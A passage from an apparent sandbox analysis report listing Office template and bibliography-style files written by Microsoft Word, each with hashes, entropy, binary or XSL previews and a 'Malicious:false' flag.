                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):7370
                                    Entropy (8bit):7.9204386289679745
                                    Encrypted:false
                                    SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                    MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                    SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                    SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                    SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                    Malicious:false
                                    Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture List]].glox (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):5596
                                    Entropy (8bit):7.875182123405584
                                    Encrypted:false
                                    SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                    MD5:CDC1493350011DB9892100E94D5592FE
                                    SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                    SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                    SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                    Malicious:false
                                    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):3683
                                    Entropy (8bit):7.772039166640107
                                    Encrypted:false
                                    SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                    MD5:E8308DA3D46D0BC30857243E1B7D330D
                                    SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                    SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                    SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                    Malicious:false
                                    Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):4888
                                    Entropy (8bit):7.8636569313247335
                                    Encrypted:false
                                    SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                    MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                    SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                    SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                    SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                    Malicious:false
                                    Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture Accent]].glox (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):6448
                                    Entropy (8bit):7.897260397307811
                                    Encrypted:false
                                    SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                    MD5:42A840DC06727E42D42C352703EC72AA
                                    SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                    SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                    SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                    Malicious:false
                                    Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture Alternating Accent]].glox (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):5630
                                    Entropy (8bit):7.87271654296772
                                    Encrypted:false
                                    SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                    MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                    SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                    SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                    SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                    Malicious:false
                                    Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture Grid]].glox (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):6193
                                    Entropy (8bit):7.855499268199703
                                    Encrypted:false
                                    SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                    MD5:031C246FFE0E2B623BBBD231E414E0D2
                                    SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                    SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                    SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                    Malicious:false
                                    Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width List]].glox (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):3075
                                    Entropy (8bit):7.716021191059687
                                    Encrypted:false
                                    SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                    MD5:67766FF48AF205B771B53AA2FA82B4F4
                                    SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                    SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                    SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                    Malicious:false
                                    Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):5151
                                    Entropy (8bit):7.859615916913808
                                    Encrypted:false
                                    SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                    MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                    SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                    SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                    SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                    Malicious:false
                                    Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):333258
                                    Entropy (8bit):4.654450340871081
                                    Encrypted:false
                                    SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                    MD5:5632C4A81D2193986ACD29EADF1A2177
                                    SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                    SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                    SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):296658
                                    Entropy (8bit):5.000002997029767
                                    Encrypted:false
                                    SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                    MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                    SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                    SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                    SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):268317
                                    Entropy (8bit):5.05419861997223
                                    Encrypted:false
                                    SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                    MD5:51D32EE5BC7AB811041F799652D26E04
                                    SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                    SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                    SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):255948
                                    Entropy (8bit):5.103631650117028
                                    Encrypted:false
                                    SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                    MD5:9888A214D362470A6189DEFF775BE139
                                    SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                    SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                    SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=

                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl (copy)

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):251032
                                    Entropy (8bit):5.102652100491927
                                    Encrypted:false
                                    SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                    MD5:F425D8C274A8571B625EE66A8CE60287
                                    SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                    SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                    SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                    Malicious:false
